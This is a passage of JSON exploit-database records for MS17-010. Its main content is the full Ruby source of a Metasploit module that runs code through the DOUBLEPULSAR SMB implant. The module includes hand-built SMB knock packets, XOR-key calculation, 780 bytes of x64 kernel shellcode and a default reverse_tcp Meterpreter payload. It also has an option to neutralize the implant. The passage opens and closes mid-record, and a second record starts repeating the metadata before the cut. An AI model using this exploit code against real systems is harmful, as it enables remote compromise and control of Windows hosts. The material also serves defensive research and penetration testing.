implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-09-01T22:15:27", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-09-01T22:15:27", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-01T22:15:27", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-02] #"}, "lastseen": "2021-09-01T22:15:27", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "aece96ec7a987e45d8f994ba1a28c0f8", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-02T22:14:33", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142603"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", 